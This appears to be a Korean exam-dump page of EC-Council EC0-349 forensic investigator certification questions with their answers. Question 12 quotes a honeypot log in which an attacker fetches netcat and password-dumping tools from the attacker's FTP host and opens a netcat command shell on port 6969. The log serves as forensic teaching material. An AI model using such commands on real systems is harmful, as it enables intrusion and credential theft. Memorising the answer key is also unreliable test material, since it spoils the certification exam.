최신 EC0-349 무료덤프 - EC-COUNCIL Computer Hacking Forensic Investigator

문제1

In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

A. Disaster Recovery

B. Network Forensics

C. Data Recovery

D. Computer Forensics

정답: D

문제2

The newer Macintosh Operating System (MacOS X) is based on:

A. Linux

B. BSD Unix

C. OS/2

D. Microsoft Windows

정답: B

문제3

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but Questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank submit the log to find out if it is a new vulnerability or not?

A. IANA

B. CVE

C. RIPE

D. APIPA

정답: B

문제4

Jacob is a computer forensics investigator with over 10 years experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob testimony in this case?computer fraud.
What is the term used for Jacob? testimony in this case?

A. Reiteration

B. Authentication

C. Justification

D. Certification

정답: B

문제5

Why is it a good idea to perform a penetration test from the inside?

A. It is never a good idea to perform a penetration test from the inside

B. Because 70% of attacks are from inside the organization

C. It is easier to hack from the inside

D. To attack a network from a hacker's perspective

정답: B

문제6

During the seizure of digital evidence, the suspect can be allowed touch the computer system.

A. True

B. False

정답: B

문제7

What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?

A. TCP header field

B. ICMP header field

C. UDP header field

D. IP header field

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제8

On an Active Directory network using NTLM authentication, where on the domain controllers are the passwords stored?

A. Password.conf

B. SAM

C. Shadow file

D. AMS

정답: B

문제9

How do you define forensic computing?

A. It is the administrative and legal proceeding in the process of forensic investigation

B. It Is a preliminary and mandatory course necessary to pursue and understand fundamental principles of ethical hacking

C. It is a methodology of guidelines that deals with the process of cyber investigation

D. It is the science of capturing, processing, and investigating data security incidents and making it acceptable to a court of law.

정답: D

문제10

Which of the following statements is incorrect related to acquiring electronic evidence at crime scene?

A. At the time of seizing process, you need to shut down the computer immediately

B. In warning banners, organizations give clear and unequivocal notice to intruders that by signing onto the system they are expressly consenting to such monitoring

C. The equipment is seized which is connected to the case, knowing the role of the computer which will indicate what should be taken

D. Sample banners are used to record the system activities when used by the unauthorized user

정답: A

문제11

What will the following Linux command accomplish? dd if=/dev/mem of=/home/sam/mem.bin bs=1024

A. Copy the memory dump file to an image file

B. Copy the contents of the system folder em?to a fileCopy the contents of the system folder ?em?to a file

C. Copy the master boot record to a file

D. Copy the running memory to a file

정답: D

문제12

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

A. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

B. The attack is a remote exploit and the hacker downloads three files

C. It is a local exploit where the attacker logs in using username johna2k

D. There are two attackers on the system ?johna2k and haxedj00

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제13

What is the "Best Evidence Rule"?

A. It contains system time, logged-on user(s), open files, network information, process information, process-to-port mapping, process memory, clipboard contents, service/driver information, and command history

B. It states that the court only allows the original evidence of a document, photograph, or recording at the trial rather than a copy

C. It contains information such as open network connection, user logout, programs that reside in memory, and cache data

D. It contains hidden files, slack space, swap file, index.dat files, unallocated clusters, unused partitions, hidden partitions, registry settings, and event logs

정답: B

최신 EC0-349 무료덤프 - EC-COUNCIL Computer Hacking Forensic Investigator

우리와 연락하기

유용한 링크

최신 업데이트